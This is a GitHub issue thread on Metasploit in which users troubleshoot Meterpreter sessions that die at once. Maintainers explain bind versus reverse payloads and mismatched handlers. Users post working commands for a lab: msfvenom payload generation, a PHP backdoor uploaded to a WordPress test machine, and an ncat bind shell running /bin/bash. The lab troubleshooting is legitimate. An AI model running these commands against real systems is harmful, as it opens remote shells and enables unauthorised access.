Session continually dies immediately #9047
Comments
|
That should never work in the first place... There's no rhost on the bind payload (the payload binds on the rhost and we connect to the bound address:port). Not familiar with the proxy software you're using, but suggest a simple direct network link to a VM to sort this out, no VPN, no proxy, just TCP/IP. |
|
Thank you sempervictus for replying. I'm not gonna lie, I don't understand, but that's not your fault or problem. At least I know what to research now. |
|
Good attitude, sorry for the word jumble. To get you started: |
|
It's just a test box so I've ran the exploit without anything in between but it just doesn't work. I don't understand what's so damn difficult. I have no prob getting an os-shell with sqlmap, why does metasploit have to be any different in terms of connections. I get reverse shells. You set up a listener then connect from a remote host. I don't understand what I could have done differently to get it to bind. I set the rhost where it said rhost. Set the lhost where it said lhost. Every single walk through from offensive security comes from the perspective that you're attacking inside the lan. How common is that really though? If you're doing an external pentest by virtue you have to be coming from the wan. Inside lan is easy. Outside lan is hard, don't know why there can't be more examples over the wan. I'm giving up on metasploit. It's just infuriating me at this point, like literally bringing me to tears. It's never worked for me once. I can do pretty much everything metasploit can manually but metasploit would def be a help. I'll just wait until I can have someone show me in person because there's no sense in me being upset over it and wasting hours and hours and hours of my time. Thank you for your help however, I do greatly appreciate it. |
|
This sounds like an area that is much in need of a specific tutorial. Don't despair, it is possible. But it does sometimes require some expert-level consideration of all of the moving parts, especially since a bind handler assumes the remote host is actually routable via RPORT and doesn't already have another service listening on that port. For instance, if you are already running a webserver on port 80, trying a bind payload on that target is going to show exactly the symptoms you see here. Metasploit will connect to your webserver when the handler starts, and say 'Session Established' and then dump a payload to your webserver. When the webserver says 'go away', that will look like the session died, when in fact, it could never even connect in the first place (in other words, the 'Session Established' message is a bit of a lie at first, since it only counts TCP connections rather than real communications as success.) I think we could take this as a cue to improve docs and user output when things are misconfigured, and especially verify that the session is real before claiming success. I'll close this for now. |
|
Well this Issue its the same I have but under different conditions therefore I'm gonna use this one: msf version is v4.16.11-dev so I set my reverse handler I get: [] [2017.10.21-13:31:29] Started reverse TCP handler on 0.0.0.0:443 It seems I cant get a working session, I tried the same on msf v4.12.4-dev and it's working perfectly. Any ideas? |
|
Bcook-rc7: A specific tutorial would be amazing!!! Thanks so much for your time and understanding. You know what'd also be awesome is if rather than having two LHOSTS (one for listener, one for connect back), the listening one were called LIHOST. Then it'd be easier to understand. I think that's where a lot of people get hung up at. Obviously I'm no where near the level you're at and it's likely super easy for you to know the difference. I'll read about how to set the LHOSTS properly but it doesn't connect with my brain. I'll have to do something successfully to understand then reverse engineer in my head why it worked. Thanks again for your assistance! |
|
For reverse_tcp you can set the LHOST to the address the payload should connect out to (the same LHOST you have given to msfvenom). If it can't bind to the address it will fall back to binding on all interfaces (0.0.0.0). There are advanced options for overriding this (ReverseListenerBindAddress I think). |
|
Having the same issue 4.16.12-dev, it's driving me nuts. Trying a php exploit, revslider, settings are correct, the file gets dumped into the web server, but my meterpreter session immediately dies, "Reason: died" So I msfvenom my own .php file - msfvenom -p php/meterpreter/bind_tcp LPORT 4000 >/temp/backdoor.php upload that, log into my virtualmachine running 5 year old ubuntu and 5 year old wordpress plus plugins, file is there, start a listener use exploit/multi/handler The second I open up the /wordpress.../backdoor.php file, I get the same immediate session closed. IP address and ports have to be right, I can hit enter, start a new listener, and then refresh the php file on my browser and it does the same thing. sending state to 172.16.1.16 I am running Kali in virtualbox, Arch Linux the host. Tested it in Windows 10, Kali VM, same issue. Any help would be appreciated. |
|
You're handling a reverse payload while binding on the host. Bind payloads listen on a port of the target host, they bind to the port. Reverse payloads connect back to you.
|
|
Sorry, thanks for the close read. I'm using set payload php/meterpreter/bind_tcp. I was typing it all out on the machine that's actually logged into git, not doing the work, which was dumb. I went ahead and created a reverse payload, started a reverse listener, exact same thing. Initiated immediately, but died. |
|
No worries. So if you are using a bind payload, can you netcat to the bound port? Php itself may also be messing w you, suggest trying a separate bind shell for testing that factor.
|
|
Ok, trying to follow along. ncat -v -l -p 4000 -e /bin/bash on my ubuntu target I used msfvenom to create a .py payload, moved it over (exploit changes it to php file, didn't feel like troubleshooting) and same thing, listener starts and waits, just dies. msfvenom -p cmd/unix/reverse_python lhost=10.9.8.2 lport=4000 -f raw > python.py --> cp file use exploit/multi/handler ./python.py on the target as root, handler opens the session and immediately dies. edit: if I'm supposed to be able to nc to port 4000 after I run the exploit, if I don't click the exploit, the connection is refused, if I time it just right, click the exploit and then nc, it appears to work but the session doesn't get established. edit2: I have no problem getting windows exploits to work, and have successfully tested a cmd/unix/interact payload, |
|
You mismatched payloads. Let's make an analogy. |
|
Thanks, fixing the handler to use the right exploit took 15 seconds and worked. ncat works, this python shell file works, is there any way to further troubleshoot php? Or should I try other things? I am running into some base64 issue when I tried to run a msfvenom'd a python/meterpreter/reverse_tcp file. Is that a trail worth going down? |
|
I took the python script out of base64, easier to manually kick off on my testing target machine that way. Ran python/meterpreter/reverse_tcp for a listener, and that worked as well. Appreciate everyone's help, I can get anything but php to work. I don't know if it's my VPN or my virtualbox or just the latest builds of msf. |
|
@chris948: Re PHP, you might want to trace the PHP execution via print
statements injected into your payload. How does PHP reverse shell behave,
drop the meterp piece for a sec, and try the raw TCP sock connecting back
to you with a REPL on the other side.
…On Sun, Oct 29, 2017 at 9:35 PM, chris948 ***@***.***> wrote:
I took the python script out of base64, easier to manually kick off on my
testing target machine that way. Ran python/meterpreter/reverse_tcp for a
listener, and that worked as well.
Appreciate everyone's help, I can get anything but php to work. I don't
know if it's my VPN or my virtualbox or just the latest builds of msf.
—
You are receiving this because you commented.
Reply to this email directly, view it on GitHub
<#9047 (comment)>,
or mute the thread
<https://github.com/notifications/unsubscribe-auth/ABRPjLckSjGLLGmFG4OcMhAhLrsydBxAks5sxSf2gaJpZM4PxOze>
.
--
Boris Lukashev
Systems Architect
Semper Victus
|
|
This is a closed ticket. If you found a bug in the code, please submit a new ticket. If you need help with metasploit, please visit the #metasploit Chan on IRC |
|
Thanks, the guy who posted the problem before me has another thread, and that one was closed because his php issue is fixed with the latest merge (v4.16.13-dev). I'm not on the git release, so I'm just waiting for kali to put it in apt, I think that addresses my issue. If that doesn't work, I'll learn enough php to print! |
|
@h00die: my fault for keeping the closed issue alive, a bit heads down
lately to be useful in IRC.
@chris948: real <insert relevant pronoun> dont use packaged installers ;-).
MSF is a framework, not so much a precanned tool (get Pro/CE for that), and
with your own deployment from git you can customize beyond the capabilities
presented by upstream.
…On Mon, Oct 30, 2017 at 7:43 PM, chris948 ***@***.***> wrote:
@sempervictus <https://github.com/sempervictus>
Thanks, the guy who posted the problem before me has another thread, and
that one was closed because his php issue is fixed with the latest merge
(v4.16.13-dev). I'm not on the git release, so I'm just waiting for kali to
put it in git, I think that addresses my issue.
If that doesn't work, I'll learn enough php to print!
—
You are receiving this because you were mentioned.
Reply to this email directly, view it on GitHub
<#9047 (comment)>,
or mute the thread
<https://github.com/notifications/unsubscribe-auth/ABRPjIKKFZDP0fd5Q1eIvYkvCMCmq2f9ks5sxl8IgaJpZM4PxOze>
.
--
Boris Lukashev
Systems Architect
Semper Victus
|
|
hey, |
I have a few issues:
I. Once getting a session, it immediately dies
Logistics
I am using Private Internet Access VPN (but have the exact same issue when not using it)
My LAN ip is 10.65.10.6
I'm using Ngrok as a means to port forward
Settings in metasploit
So I run again:
[-] Invalid session identifier: 2
Now it says 'invalid session identifier'
When I am able to get a shell in Metasploit community, when I click on 'command shell' it opens and I'm given a message the session has been disconnected as well as this input:
II
Only on Armitage and Metasploit Community edition am I told when a successful session has been established. I can establish a session using msfconsole but will get the 'no session created' message even when a successful session had been established.
Further, I have to run the exploit several times with the same settings to get it to work and give me a session.
Any help would be greatly appreciated! I've been struggling with this for weeks and have a jaw dropping 93 closed sessions on the target. I am running the latest distribution of Kali Linux as my OS (not a VM) and have updated Metasploit.
The text was updated successfully, but these errors were encountered: